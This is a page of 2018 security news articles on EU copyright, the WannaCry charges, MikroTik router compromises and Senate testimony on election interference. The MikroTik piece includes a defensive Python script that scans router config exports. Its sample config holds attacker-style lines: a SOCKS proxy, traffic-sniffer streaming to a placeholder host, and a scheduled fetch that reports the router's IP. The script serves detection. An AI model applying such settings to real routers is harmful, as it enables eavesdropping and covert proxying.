
Tech News - Security

470 Articles

YouTube’s CBO speaks out against Article 13 of EU’s controversial copyright law

Natasha Mathur
07 Sep 2018
3 min read
Robert Kyncl, YouTube's Chief Business Officer, spoke out on YouTube’s Creator Blog on Tuesday about “Article 13” of the EU copyright proposal, which is currently up for a vote in the European Parliament on September 12.

According to Article 13, there is an “obligation on information society service providers storing and giving access to large amounts of works and other subject-matter uploaded by their users to take appropriate and proportionate measures to ensure the functioning of agreements concluded with right holders and to prevent the availability on their services of content identified by rightholders in cooperation with the service providers”. In a nutshell, any user-generated content on these online platforms that a copyright enforcement algorithm considers to be copyrighted work would need to be censored by the platforms.

This is a revamped version that the EU has come out with after the older version was rejected by the Parliament back in July. The older version also received heavy criticism from policy experts and digital rights groups on the grounds of violating the fundamental rights of internet users.

“The ‘Article 13’ potentially undermine this creative economy, discouraging or even prohibiting platforms from hosting user-generated content. This outcome would not only stifle your creative freedom, it could have severe, negative consequences for the fans, the communities and the revenue you have all worked so hard to create,” mentioned Kyncl. Kyncl also pointed out how the creators and artists on these platforms have built businesses “on the back” of this “openness”.

YouTube has a strong set of copyright management tools, such as Content ID and a Copyright Match Tool, which are pretty efficient at managing re-uploads of creators’ content.

“Copyright holders have control over their content: they can use our tools to block or remove their works, or they can keep them on YouTube and earn advertising revenue. In over 90% of cases, they choose to leave the content up. Enabling this new form of creativity and engagement with fans can lead to mass global promotion and even more revenue for the artist,” reads the YouTube blog post.

A good example given by Kyncl is that of the famous pop singer Dua Lipa, whose singing career started with covering songs by other artists. Also, Alan Walker’s worldwide famous track “Fade” was heavily used by other users in the YouTube community, along with being used in video games. This resulted in a massive fanbase for him.

YouTube is not the only one disapproving of the new proposal. Other organizations such as European Digital Rights, the Internet Archive, Patreon, WordPress, and Medium have all spoken out about their disapproval of the EU copyright policy.

“This is the new creative economy in action. The Copyright Directive won’t just affect creators and artists on YouTube. It will also apply to many forms of user-generated content across the Internet,” writes Kyncl.

For more information, check out the official YouTube blog post.

North Korean hacker charged for WannaCry ransomware and for infiltrating Sony Pictures Entertainment

Melisha Dsouza
07 Sep 2018
2 min read
The US Justice Department has charged a North Korean hacker, Park Jin Hyok, for the devastating cyberattacks that hacked Sony Pictures Entertainment and unleashed the WannaCry ransomware virus in 2017. The US alleges that Mr. Park worked as a computer programmer for Chosun Expo Joint Venture, a wing of the North Korean military.

Hyok is charged with extortion, wire fraud, and various hacking crimes that could potentially carry a prison term of up to 25 years. The criminal complaint against Hyok was filed in Los Angeles federal court in June and unsealed this Thursday. It alleges that Mr. Park and the Joint Venture sought to “conduct multiple destructive cyber attacks around the world” in support of the North Korean government.

Timeline of Cybercrimes committed by Hyok

In 2017, the WannaCry ransomware attack affected more than 230,000 computers and caused hundreds of millions of dollars in damages around the world. One of the main targets affected was the UK’s National Health System, which was forced to cancel thousands of appointments after its systems were infected. The Justice Department asserts that the North Korean hacking team both developed the ransomware and propagated the attacks.

Mr. Park is also charged in connection with an $81 million (£62 million) theft from a bank in Bangladesh in 2016.

He is further accused of aiding the 2014 hack into Sony Pictures Entertainment, in which data was destroyed and internal documents were made publicly available online for anyone to download. The attack came shortly after Sony produced a comedy film, ‘The Interview’, about an attempted assassination of a man who was made to look like North Korean leader Kim Jong-un, indirectly mocking him.

According to the Justice Department, Mr. Park is also charged for “numerous other attacks or intrusions on the entertainment, financial services, defence, technology, and virtual currency industries, academia, and electric utilities”.

The charges were filed four days before President Donald Trump’s meeting with North Korea’s leader, Kim Jong-un, to discuss ending hostility between the two countries. Prosecutors said the complaint wasn’t sealed to prevent derailing their meeting in Singapore.

Head over to CNET for more insights on this news.

Winbox vulnerability in MikroTik routers forwarding traffic to attackers, say researchers at Netlab 360

Savia Lobo
07 Sep 2018
3 min read
Research by China's Netlab 360 revealed that thousands of routers manufactured by the Latvian company MikroTik have been compromised by malware attacking Winbox, a Windows GUI application. This vulnerability allows gaining access to an unsecured router.

The Winbox vulnerability was revealed in April this year, and MikroTik had also posted a software update for it. However, researchers found that more than 370,000 MikroTik devices they identified on the Internet were still vulnerable.

According to a report by Netlab 360's Genshen Ye, “More than 7,500 of them are actively being spied on by attackers, who are actively forwarding full captures of their network traffic to a number of remote servers. Additionally, 239,000 of the devices have been turned into SOCKS 4 proxies accessible from a single, small Internet address block.”

Prior to the MikroTik attack, WikiLeaks revealed a vulnerability from the CIA's ‘Vault7’ toolkit. According to WikiLeaks, the CIA Vault7 hacking tool Chimay Red involves 2 exploits, including Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.

Attacks discovered on the MikroTik routers

Previously, researchers at Trustwave had also discovered two malware campaigns against MikroTik routers based on an exploit reverse-engineered from a tool in the Vault7 leak.

#1 Attack targeting routers with CoinHive Malware

The first attack targeted routers in Brazil with CoinHive malware. The attack injected the CoinHive JavaScript into an error page presented by the routers' Web proxy server. It further redirected all Web requests from the network to that error page. However, in routers affected by this type of malware found by the Netlab 360 team, all the external web resources, including those from coinhive.com necessary for web mining, are blocked by the proxy ACLs (access control lists) set by the attackers themselves.

#2 Attack that turns affected routers into a malicious proxy network

The other attack, discovered by the Netlab 360 team, has turned affected routers into a malicious proxy network. This was done by using the SOCKS4 protocol over a very non-standard TCP port (4153). Ye said, “Very interestingly, the Socks4 proxy config only allows access from one single net-block, 95.154.216.128/25.” Most of the traffic is said to be going to 95.154.216.167, an address associated with a hosting service in the United Kingdom.

This attack includes the addition of a scheduled task that reports the router's IP address back to the attacker, to help maintain the persistence of the SOCKS proxy if the router is rebooted.

Eavesdropping on routers

Netlab 360 researchers also discovered that more than 7,500 victims are being actively eavesdropped on, with their network traffic largely being streamed out. This includes FTP- and email-focused traffic, as well as some traffic associated with network management. The majority of the streams, almost 5,164 of them, were being sent to an address associated with an ISP in Belize.

Attackers have leveraged MikroTik's built-in packet-sniffing capabilities for eavesdropping over the network. Here, the sniffer, which uses the TZSP protocol, can send a stream of packets to a remote system using Wireshark or other packet capture tools.

To know more about this news in detail, visit the Netlab 360 blog.
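A defender can check a router's configuration export for the three changes described above: an enabled SOCKS proxy, packet-sniffer streaming to a remote host, and an unexpected scheduled task. The script below is an added example, not code from Netlab 360 or MikroTik; it assumes the text layout of a RouterOS `/export` dump, and the sample configuration, the address 203.0.113.10 and the scheduler entry are constructed for illustration.

```python
import ipaddress
import re
import shlex

# Indicators stated in the article.
REPORTED_SOCKS_PORT = 4153
REPORTED_NETBLOCK = ipaddress.ip_network("95.154.216.128/25")
VERBS = {"set", "add"}

# Constructed sample in the style of a RouterOS "/export" dump, not a real device.
# 203.0.113.10 and example.invalid are placeholders invented for this example.
SAMPLE_EXPORT = r'''
# constructed sample
/ip socks
set enabled=yes port=4153
/ip socks access
add src-address=95.154.216.128/25
add action=deny src-address=0.0.0.0/0
/tool sniffer
set streaming-enabled=yes \
    streaming-server=203.0.113.10
/system scheduler
add interval=30s name=report on-event="/tool fetch url=http://example.invalid/ip"
/ip service
set winbox address=192.0.2.0/24
'''


def parse_export(text):
    """Return (menu, verb, params) tuples from export-style text."""
    # Join lines that are continued with a trailing backslash.
    text = re.sub(r"\\\r?\n\s*", "", text)
    menu, entries = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            tokens = shlex.split(line)  # keeps a quoted on-event script as one token
        except ValueError:
            tokens = line.split()       # unbalanced quotes: fall back to plain splitting
        if line.startswith("/"):
            # Either a bare menu line ("/ip socks") or menu plus command on one line.
            idx = next((i for i, t in enumerate(tokens) if t in VERBS), None)
            menu = " ".join(tokens if idx is None else tokens[:idx])
            if idx is None:
                continue
            tokens = tokens[idx:]
        params = {}
        for tok in tokens[1:]:
            key, sep, value = tok.partition("=")
            if sep:
                params[key] = value
        entries.append((menu, tokens[0], params))
    return entries


def audit(text, trusted_servers=()):
    """Return (severity, message) findings for the three changes the article describes."""
    findings = []
    for menu, verb, p in parse_export(text):
        if menu == "/ip socks" and p.get("enabled") == "yes":
            # Assumption: the export omits default values and the default SOCKS port is 1080.
            port = int(p.get("port", 1080))
            severity = "high" if port == REPORTED_SOCKS_PORT else "review"
            findings.append((severity, f"SOCKS proxy enabled on TCP {port}"))
        elif menu == "/ip socks access" and verb == "add":
            try:
                net = ipaddress.ip_network(p.get("src-address", ""), strict=False)
            except ValueError:
                continue
            if net.version == 4 and net.subnet_of(REPORTED_NETBLOCK):
                findings.append(
                    ("high", f"SOCKS access rule for {net} is inside {REPORTED_NETBLOCK}"))
        elif menu == "/tool sniffer" and p.get("streaming-enabled") == "yes":
            server = p.get("streaming-server", "unset")
            if server not in trusted_servers:
                findings.append(("high", f"packet sniffer streaming to {server}"))
        elif menu == "/system scheduler" and verb == "add":
            # Every scheduler entry is listed so it can be compared with a known-good baseline.
            name = p.get("name", "?")
            findings.append(
                ("review", f"scheduler entry {name!r} runs: {p.get('on-event', '')}"))
    return findings


if __name__ == "__main__":
    for severity, message in audit(SAMPLE_EXPORT):
        print(f"[{severity}] {message}")
```

Pass the addresses of any capture hosts you operate yourself as `trusted_servers` so that legitimate sniffer streaming is not reported.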

Facebook, Twitter open up at Senate Intelligence hearing, committee does ‘homework’ this time

Fatema Patrawala
06 Sep 2018
14 min read
Five months after Facebook founder Mark Zuckerberg appeared before Congress, the US government once again invited top tech executives from Facebook, Twitter, and Google to the fourth and final installment of the series of high-profile hearings on social media’s role in US democratic proceedings.

Facebook COO Sheryl Sandberg and Twitter CEO Jack Dorsey faced the Senate Select Intelligence Committee to discuss national security issues and foreign interference in US elections through social media platforms. Google was notably absent from the proceedings, after the firm failed to send a senior executive ‘at the right level’ to Washington. Google submitted a written testimony ahead of the hearing, which the Senate discarded. In place of a Google representative, the Senate committee left an empty chair.

Opening Remarks from the Senate Chairman Richard Burr and the Vice Chairman Mark Warner

Chairman of the Senate Richard Burr made his opening remarks welcoming Twitter CEO Jack Dorsey and Facebook COO Sheryl Sandberg. He started with some words from the recently passed John McCain. McCain's place at the hearing was marked with a single white rose on a black cloth. "He will be dearly missed," Chairman Burr said.

He opened his speech by discussing social media over the last 18 months. He acknowledged its immense potential for good but highlighted how the recent past has shown how vulnerable social media can be to corruption and misuse. He said the committee takes this issue very seriously and appreciates the fact that Facebook and Twitter have taken responsibility with an equivalent and appropriate measure of seriousness and, unlike their peer Google, have shown up for the hearing with the ‘appropriate level of corporate representation’. He further added that the purpose of this hearing was to discuss the role social media plays in the execution of foreign influence operations.

The Chairman made the point that it is important to be candid in our language, because that is what the significance of this threat demands. He said, “We need to be precise about the foreign actors we are talking about. We need to be precise about the consequences of not acting and we need to be candid about being responsible for solving this problem and where it lies.”

Chairman Burr said that "business as usual" for these tech firms is not good enough. "We've identified the problem, now we've got to find a solution," he added. He also added a jibe at Google for failing to send the "right senior executive".

His sentiments were echoed by Vice Chairman Mark Warner, who took over from Burr. He was "deeply disappointed" in Google for not taking the issues being discussed yesterday seriously enough.

Vice Chairman Mark Warner also put forward some thoughts and open questions to Twitter and Facebook to improve their policies and systems:

  • Users should have the right to know when they are interacting with bots or humans on the platform.
  • Isn't there a public interest in ensuring there is more anonymised data to help researchers and academics identify potential problems and misuse?
  • Why are your terms of service so difficult to find and nearly impossible to read and understand?
  • Ideas like data portability, data immunization or first party consent should be adopted.
  • After encountering numerous situations of misuse, what kind of accountability should be implemented for the flawed advertising model?

Sheryl Sandberg’s defending comments

Facebook COO Sheryl Sandberg smoothly projected the impression that the company is always doing something, whether that’s combating hate speech, hoaxes and “inauthentic” content, or IDing and blocking state-level disinformation campaigns, thereby shifting attention off the deeper question of whether Facebook is doing enough.

Many of her answers courteously informed senators that Facebook would ‘follow up’ with answers and/or by providing some hazily non-specific ‘collaborative work’ at some undated future time, which is the most professional way to kick awkward questions.

Sandberg started her opening remarks by thanking the committee for giving her the opportunity to speak at the Senate hearing. Her written testimony goes into more detail; here are a few points Sandberg reiterated in the session:

  • Russia used our platform to interfere in the US elections, and Facebook was too slow to spot this and too slow to act, and that is on us, she said.
  • She mentioned taking collaborative efforts with government and law enforcement committees.
  • She further stated that Facebook is investing in long-term security and has doubled the number of people working in safety and security. They are able to view security reports in 50 languages, 24 hours a day.
  • They use better ML and AI techniques to be more proactive in finding abuse.
  • Their first line of defense is finding and taking down fake accounts and pages, and blocking millions of attempts to make fake accounts.
  • They are making progress on fake news and limiting its distribution as well. They mark articles using third-party fact checkers and warn people who have shared them or are about to share them. They show them related articles with more facts for a more well-rounded opinion.
  • Strong steps have been taken to prevent abuse and increase transparency on their advertising platform. For political issue ads, you can now see who paid for the ads, how much they paid and the demographics of the advertisers.
  • Advertisers are also required to go through a long authorization process to confirm their authentic identity.

Finally, Sandberg concluded by saying that these steps won't stop people who are trying to game the system, but they will make it a lot harder. She emphasized working more collaboratively with the government and law enforcement agencies.
She continued that Facebook is more determined than its opponents and that they are in a grey area, working together to meet this challenge.

Jack Dorsey’s defence

“We weren’t expecting any of this when we created Twitter over 12 years ago. We acknowledge the real-world negative consequences of what happened, and we take full responsibility to fix it.”

Here's the opening to Jack Dorsey's prepared statement:

“Thank you for the opportunity to appear before the Committee today so I may speak to you and the American people. Twitter’s purpose is to serve the public conversation. We are an American company that serves our global audience by focusing on the people who use our service, and we put them first in every step we take. Twitter is used as a global town square, where people from around the world come together in an open and free exchange of ideas. We must be a trusted and healthy place that supports free and open discussion. Twitter has publicly committed to improving the collective health, openness, and civility of public conversation on our platform. Twitter’s health is measured by how we help encourage more healthy debate, conversations, and critical thinking. Conversely, abuse, malicious automation, and manipulation detracts from the health of our platform. We are committed to hold ourselves publicly accountable towards progress of our health initiative. Today, I hope my testimony before the Committee will demonstrate the challenges that we are tackling as a global platform. Twitter is approaching these challenges with a simple question: How do we earn more trust from the people using our service? We know the way we earn more trust around is how we make decisions on our platform to be as transparent as possible. We want to communicate how our platform works in a clear and straightforward way.”

Jack mentions, “Abuse, harassment, troll armies, propaganda through bots and human coordination, misinformation campaigns, and divisive filter bubbles…that’s not a healthy public square. Worse, a relatively small number of bad-faith actors were able to game Twitter to have an outsized impact. We weren’t expecting any of this when we created Twitter over 12 years ago. We acknowledge the real-world negative consequences of what happened, and we take full responsibility to fix it. We’ve seen positive results from our work. We’re now removing over 200% more accounts for violating our policies. We’re identifying and challenging 8-10 million suspicious accounts every week. And we’re thwarting over a half million accounts from logging in to Twitter every day. Today we’re committing to the people, and this committee, to do that work, and do it openly. We’re here to contribute to a healthy public square, not compete to have the only one.”

Few Questions to the witnesses from the Senators in the committee

Senator James E. Risch Questions on Hate Speech

“Who sets the security standards or the descriptions of authority of manipulative content and if there is any kind of unanimity amongst them or are there any debates or hate speeches in the team”

Sandberg said that language that leads to violence is not permitted on their platform, and Twitter CEO Dorsey shared the same view.

Risch asked whether there was any way for Facebook to distinguish between US citizens and people from other countries. Sandberg responded that Facebook asks people to declare where they are from. People are allowed to talk about any country, but are not allowed to talk about hate. They are not allowed to interfere in or influence elections. Facebook is also looking to dive further into transparency reporting.

Twitter is focusing on behavioural patterns. It tracks common patterns of behaviour and uses that information to find inauthentic content. They have built deep learning and machine learning technologies to recognize these patterns quickly and shut them down before they spread to other areas.

Senator Martin Heinrich on Threat to Elections

“What is it that you have learned from the past elections since 2016 as the platforms have been used throughout the course of a number of elections around the world. And how you have informed your current posture in terms of how you are gaining transparency in this activity?”

Sandberg said that Facebook is getting smarter at detecting and preventing threats to elections but warned that the opponents are getting smarter as well. Dorsey followed by mentioning how Twitter is working with AI tools to recognise patterns of behaviour that allow people to artificially amplify information.

Senator Susan Collins on why Twitter doesn't notify individuals

“Once you’ve taken down accounts that are linked to Russia, these imposter accounts, what do you do to notify the followers of those accounts that they have been following or engaged in accounts that originated in Russia and are not what they appear to be.”

“We simply haven’t done enough… we do believe transparency is a big part of where we need improvement... We need to meet people where they are... We are going to do our best to make sure that we catch everything via external partnership and other channels. We recognise we need to communicate more directly,” said Jack Dorsey.

He also added, “We are looking to incentivise people not only based on the number of followers they have but also the way they share content online. By what kind of content they share. We are also looking to expand our transparency report and extend the same to the public.”

How Can Facebook & Twitter Clean Their Systems?

“We have been investing heavily in identifying bad actors in the system. Most of our takedowns have been on our own, but we have coordinated with external parties to make this successful,” said Sandberg.

Dorsey had his own response, saying, “There are a number of short term risks involved but the only way we'll grow is by building the platform's health and we have strengthened our partnership with government agencies and law enforcement partners.”

The stock prices of Twitter and Facebook don’t seem to be holding up to the questioning and have been dropping since the hearing began.

Sandberg added, “the most important determinant is what people choose to follow. If you don’t want to follow someone we encourage that. We are going to do a contribution to investing in technology to figure out a solution to battle deep fake news.”

“I encourage both of you to work closely with academia… I hope that you will commit to providing data that goes beyond a 3 year window to researchers who are looking into Russian influence on your platforms”, concluded Senator Collins.

Senator Harris on business incentive alignment and policy inconsistencies at Facebook

“What metric are you using to calculate the revenue generated associated with those [inorganic] ads? And what is the dollar amount that is associated with that revenue?... What percentage of content on Facebook is inorganic?.. You must know.”

Sandberg answered, “Ads don’t run with inorganic content on our service. So there is no way to firmly ascertain how much ads are attached to how much organic content and that’s not how we work.”

Harris further asked, “How can you reconcile an incentive to create and increase your user engagement when the content that generates a lot of engagement is often inflammatory in nature?”

Sandberg gave a specific example of Facebook’s hate speech moderation failure, a financially incentivized policy and moral failure.
She referenced a ProPublica report from June 2017, which revealed the company had told moderators to delete hate speech targeting white men but not black children as they were a protected class. She continued that it was a bad policy and they had fixed it. Harris asked whether the policy was changed after the report. Sandberg uncomfortably responded that she would get back to the committee on the specifics of when and what would have happened.

Senator Blunt on liability implications and learning from attempts at improving the platforms this year

“In the interest of transparency and public education…, are you willing to archive suspended accounts...?”

Dorsey opened by saying, “As we think about our singular priority of improving the health of public conversations, we are not going to be able to do long term work unless we’re looking at the incentives that our product is asking people to do everyday.” Dorsey agreed that archiving historical data is a great idea, but said that further understanding of the legal implications of such an action is needed.

“The business implications, the liability implications of what we’re asking you to do are pretty grey,... what’s the challenge here?” asked Blunt.

“Tighter co-ordination helps,” Sandberg responded.

“We’d like regular cadence of meetings with our law enforcement partners, we’d love to understand the secular trends that they are aware of in our peer companies our other mediums or more broadly that would inform us on how to act faster. We’d appreciate consolidating to a single point of contact instead of bouncing between multiple agencies to do our work,” added Dorsey.

Senator Lankford on Data of Suspended Accounts

Both Twitter and Facebook keep records of the suspended accounts for later analysis and also for referrals by law enforcement bodies. Sandberg was also questioned on the number of fake accounts on Facebook.

Senator Manchin on Why Facebook & Twitter Don't Operate in China

Both Facebook and Twitter do not operate in China because the Chinese government hasn’t allowed these platforms in the country, Sandberg and Dorsey unanimously replied to the senator.

US Senator Cotton on Why Wikileaks is Active on Facebook and Twitter

WikiLeaks and Julian Assange remain active on Facebook & Twitter. Sandberg said that these accounts don’t violate any of Facebook's terms. Dorsey also supported the viewpoint and clarified that Twitter is open to inviting law enforcement to investigate if needed.

US Senate Vice Chairman Mark Warner Wraps It Up

Warner thanked both Dorsey and Sandberg for their presence and urged both to make their platforms safer for users across the US. He also thanked them for taking down bad actors online and for helping in the fight against fake news. US Senate Chairman Richard Burr also thanked both individuals for being present and addressing the senators’ questions.

To watch the full coverage of the hearing, visit the US Senate Select Intelligence official page.

Google’s Senate testimony, “Combating disinformation campaigns requires efforts from across the industry.”

Fatema Patrawala
05 Sep 2018
5 min read
Ahead of today’s congressional hearing on social media companies’ efforts to thwart election meddling in advance of November’s midterm races, Alphabet Inc.’s Google posted a “testimony”. The Senate had invited Alphabet Inc. CEO Larry Page, and also extended the invitation to Google CEO Sundar Pichai, to testify at the hearing. However, neither official is attending the hearing, and Google planned to send its Chief Legal Officer, Kent Walker, to testify before the panel instead.

The Senate Intelligence Committee has rejected Google’s Chief Legal Officer Kent Walker as a witness. The committee does not consider Walker to be placed at a high enough level in the company to testify at Wednesday’s hearing. The panel also expects to hear testimony from Twitter Inc. Chief Executive Jack Dorsey and Facebook Inc. Chief Operating Officer Sheryl Sandberg on Wednesday.

Kent Walker says in his blog post, “I will be in Washington briefing Members of Congress on our work on this and other issues and answering any questions they have, and will be submitting this testimony.”

Here are the key highlights of the testimony:

Verification program: A verification program has been rolled out for anyone who wants to purchase a federal election ad on Google in the U.S. Google will require advertisers to provide government-issued identification information and other key information to confirm they are a U.S. citizen or lawful permanent resident or a U.S.-based organization, as per the law.

In-ad disclosures: To help people better understand who is paying for an election ad, Google has incorporated In-ad Disclosures. It means Google will be able to identify by name advertisers running election-related campaigns on Search, YouTube, Display and Video 360, and the Google Display Network.

Transparency report: Google launched a “Political advertising on Google” Transparency Report for election ads, which will provide data about the entities buying election-related ads on the platforms, how much money is spent across states and congressional districts on such ads, and who the top advertisers are overall. The report will also show the keywords advertisers have spent the most money on for ads of political importance during the current U.S. election cycle, from May 31st, 2018 onwards.

Searchable election Ad library: Finally, Google will offer a searchable election Ad Library within their public Transparency Report, which will show things like which ads had the highest views, what the latest election ads running on our platform are, and deep dives into specific advertisers’ campaigns. The data shows the overall amount spent and number of ads run by each election advertiser, and whether the advertiser targeted its ad campaigns geographically or by age or gender. It will also show the approximate amount spent on each individual ad, the approximate impressions generated by each ad, and the dates each ad ran on the platform.

In addition to the transparency efforts, Google has implemented a number of initiatives to improve the cybersecurity posture of candidates, campaigns, and the election infrastructure. In October 2017, they unveiled the Advanced Protection Program, which they claim will provide the strongest account protection that Google offers. Second, in May 2018, Google’s Jigsaw project, dedicated to building technology to address significant security challenges, announced the availability of Project Shield to U.S. political organizations (e.g., candidates, campaigns, political action committees) registered with the appropriate electoral authorities. Project Shield is a free service that will use Google technology to prevent distributed denial of service (DDoS) attacks that block access to content. Lastly, Google continues to issue warnings to users when it suspects they are at risk of state-sponsored efforts to hijack their accounts.

But they also acknowledge that combating disinformation campaigns is next to impossible for any single company to shoulder.

“We have deployed our most advanced technologies to increase security and fight manipulation, but we realize that no system is going to be 100% perfect. Our algorithms are designed to identify content that many people find relevant and useful. We are constantly looking to find signals that help us identify deceptive content, while promoting content that is authoritative, relevant, and current. We have made substantial progress in preventing and detecting abuse, and are seeing continued success in stopping bad actors attempting to game our systems. And as threats evolve, we will continue to adapt in order to understand and prevent new attempts to misuse our platforms. We certainly can’t do this important work alone. Combating disinformation campaigns requires efforts from across the industry. We’ll continue to work with other companies to better protect the collective digital ecosystem, and, even as we take our own steps, we are open to working with governments on legislation that promotes electoral transparency.”

Kent concluded saying, “While the nature of our services and the way we run our advertising operations appears to have limited the amount of state-sponsored interference on our platforms, no system is perfect—and we are committed to taking continuing action to address the issue. Over the course of the last 18 months.”
Savia Lobo
05 Sep 2018
8 min read

Facebook COO, Sandberg’s Senate testimony: On combating foreign influence, fake news, and upholding election integrity

Facebook COO Sheryl Sandberg presented Facebook’s testimony to the US Senate select committee at its hearing on Wednesday, 5th September 2018. Twitter and Google also offered their testimonies at the hearing.

Facebook has had a tumultuous couple of years centered around the misuse of its platform and abuse of its users’ data and privacy by advertisers, political entities and foreign bad actors. The Cambridge Analytica scandal is just one example. Another is where Russians used Facebook to meddle with the 2016 US Presidential elections.

Sheryl Sandberg started her testimony with an apology: “We were too slow to spot this and too slow to act. That’s on us. This interference was completely unacceptable. It violated the values of our company and of the country we love.”

She also highlighted the efforts taken by Facebook to keep its community safe and its user services secure, which include:

  • Using artificial intelligence to help find bad content and locate bad actors.
  • Shutting down fake accounts and reducing the spread of false news.
  • Setting up new ad transparency policies, ad content restrictions, and documentation requirements for political ad buyers.
  • Better anticipating risks and working closely with law enforcement and its industry peers to share information and make progress together.
  • Removing hundreds of Pages and accounts involved in coordinated inauthentic behavior, meaning they misled others about who they were and what they were doing.

Sandberg then covered these highlights in detail and presented the ways in which Facebook plans to combat the issues. She said, “At its best, Facebook plays a positive role in our democratic process—and we know we have a responsibility to protect that process on our service. We’re investing for the long term because security is never a finished job. Our adversaries are determined, creative, and well-funded. But we are even more determined—and we will continue to fight back.”

Facebook assesses past Russian attempts to influence elections

Sheryl said that, before election day in November 2016, Facebook detected and mitigated several threats from actors with ties to Russia, such as the APT28 activity. It also recorded new behaviour, such as the creation of fake IDs linked to a Facebook Page named DCLeaks, which Facebook later removed.

After the 2016 elections, Facebook found that the Internet Research Agency (IRA), a Russian entity located in St. Petersburg, Russia, had used coordinated networks of fake Pages and accounts to interfere in the election. Sheryl stated, “Around 470 fake Pages and accounts associated with the IRA spent approximately $100,000 on about 3,500 Facebook and Instagram ads between June 2015 and August 2017. Our analysis showed that these accounts used these ads to promote roughly 120 Facebook Pages that they had set up, which had posted more than 80,000 pieces of content between January 2015 and August 2017. We shut down the accounts and Pages we identified at the time that were still active. The Instagram accounts we deleted had posted about 120,000 pieces of content.”

In April of this year, Facebook took down more than 270 additional Pages and accounts controlled by the IRA. It continues to monitor its service for abuse and to share information about these threats with law enforcement and others in the industry.

Facebook combats foreign election interference and also advances on election integrity

Facebook has more than doubled the number of people working on safety and security and now has over 20,000 people. They review reports in over 50 languages, 24 hours a day. Better machine learning technology and artificial intelligence have also enabled highly proactive identification of abuse.

Removing fake accounts. Sheryl mentioned that Facebook focuses on removing fake accounts. She added, “One of the main ways we identify and stop foreign actors is by proactively detecting and removing fake accounts, since they’re the source of much of the interference we see.” Some important measures Facebook is taking are:

  • Use of both automated and manual review to detect and deactivate fake accounts. These systems analyze distinctive account characteristics and prioritize signals that are more difficult for bad actors to disguise.
  • It has blocked millions of attempts to register fake accounts every day.
  • It has globally disabled 1.27 billion fake accounts from October 2017 to March 2018.
  • By using technologies like machine learning, artificial intelligence, and computer vision, Facebook is proactively detecting more bad actors and taking action more quickly.

Tackling False News. Facebook has partnered with third-party fact-checking organizations to limit the spread of articles they rate as false, and it further disrupts the economic incentives for traffickers of misinformation. It has also invested in news literacy programs and works to inform people by providing more context on the stories they see.

Increasing Ad Transparency. Facebook has taken strong steps to prevent abuse and increase transparency in advertising. It ensures that all politics and issue ads on Facebook and Instagram in the U.S. are clearly labeled with a “Paid for by” disclosure at the top of the ad so people can see who is paying for them. This is especially important when the Page name doesn’t match the name of the company or person funding the ad.

Enforcing Compliance with Federal Law. Facebook’s compliance team maintains a Political Activities and Lobbying Policy that is available to all employees. This Policy is covered in its Code of Conduct training for all employees and includes guidelines to ensure compliance with the Federal Election Campaign Act.

Suspicious Activity Reporting. Facebook has designed certain processes to identify inauthentic and suspicious activity. It also maintains a sanctions compliance program to screen advertisers, partners, vendors, and others using its payment products. Its payments subsidiaries file Suspicious Activity Reports on developers of certain apps and take other steps as appropriate, including denying such apps access to the Facebook platform.

Facebook defending against targeted hacking

Sheryl Sandberg also highlighted how Facebook is strengthening its defenses against a broader set of threats. Some of the defenses include:

  • Building AI systems to detect and stop attempts to send malicious content.
  • Providing customizable security and privacy features, including two-factor authentication options and marketing to encourage people to adopt them.
  • Sending notifications to individuals if they have been targeted by sophisticated attackers, with custom recommendations depending on the threat model.
  • Sending proactive notifications to people who have not yet been targeted, but may be at risk based on the behavior of particular malicious actors.
  • Deploying AI systems to monitor login patterns and detect the signs of a successful account takeover campaign.

Facebook working with government entities, industry, and civil society

Sheryl mentioned in her testimony, “We have worked successfully with the DOJ, the FBI, and other law enforcement agencies to address a wide variety of threats to our platform, and we are actively engaged with DHS and the FBI’s new Foreign Influence Task Force focused on election integrity.”

Facebook has also partnered with cybersecurity firms such as FireEye, which informed it about a network of Pages and accounts originating from Iran that engaged in coordinated inauthentic behavior. Based on this information, Facebook started an investigation and identified and removed additional accounts and Pages from the network.

The Facebook security team regularly conducts internal reviews to monitor for state-sponsored threats that are not publicly disclosed, for security reasons. They monitor and assess thousands of account details, such as location information and connections to others on Facebook.

Sheryl also added, “As part of official investigations, government officials sometimes request data about people who use Facebook. We have an easily accessible online portal and processes in place to handle these government requests, and we disclose account records in accordance with our terms of service and applicable law. We also have law enforcement response teams available around the clock to respond to emergency requests.”

Facebook also participated in discussions with governments around the world at key events such as the Munich Security Conference and CyCon, which is organized by the NATO Cooperative Cyber Defense Centre of Excellence.

Sheryl Sandberg concluded her testimony by saying that the Facebook community is learning from what happened and is improving. She said, “When we find bad actors, we will block them. When we find content that violates our policies, we will take it down. And when our attackers use new techniques, we’ll share them to improve our collective defense. We are even more determined than our adversaries, and we will continue to fight back.”

Here’s the link to Sheryl Sandberg’s complete testimony to the US Senate Committee.
Natasha Mathur
03 Sep 2018
3 min read

Reddit posts an update to the FireEye’s report on suspected Iranian influence operation

After FireEye’s announcement two weeks ago of a suspected influence operation in Iran (using a network of fake news sites), Reddit started its own investigation into these suspicious websites. Just two days ago, Reddit shared the findings of its investigation. It also consulted with third parties to dig deeper into the matter and get more relevant information.

The influence group in Iran is leveraging the inauthentic websites “to promote political narratives in line with Iranian Interests”. These narratives comprise anti-Saudi, anti-Israeli, and pro-Palestinian themes. The group also supports U.S. policies which are favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA).

According to Reddit, 143 accounts have been uncovered so far that are suspected to be linked to this influence group. The majority (126) of these accounts were created between 2015 and 2018, with a few (17) of these accounts dating back to 2011. More than 51 accounts were banned by Reddit before beginning the investigation, as part of its trust and safety practices. Additionally, no ads were posted by these accounts on Reddit.

These groups were found to be focused on discussing subjects that are important to Iran, such as criticism of US policies in the Middle East, negative sentiment toward Saudi Arabia and Israel, and discussions regarding Syria and ISIS. Around 60% of the accounts had karma below 1,000, out of which 36% had zero or negative karma. However, a minority of 40% of the accounts had more than 1,000 karma.

Reddit is planning to keep these accounts with varied karma levels public. This is to make the moderators, investigators, and users on Reddit more aware of the tactics that foreign agents could attempt to use. However, Reddit will be removing some accounts in the future.

Reddit found the behavior of these accounts notable in that, even though their overall influence was low, some of them were still able to gain traction. It was noted that these accounts would share news and articles aligned to Iran’s political narrative, such as highlighting civilian deaths in Yemen.

The investigation is, according to Reddit, a tribute to the “incredible vigilance” of the Reddit community. Reddit is now planning to develop a trusted reporter system which will be able to better separate useful information from the junk. It is also investing in advanced detection and mitigation methods.

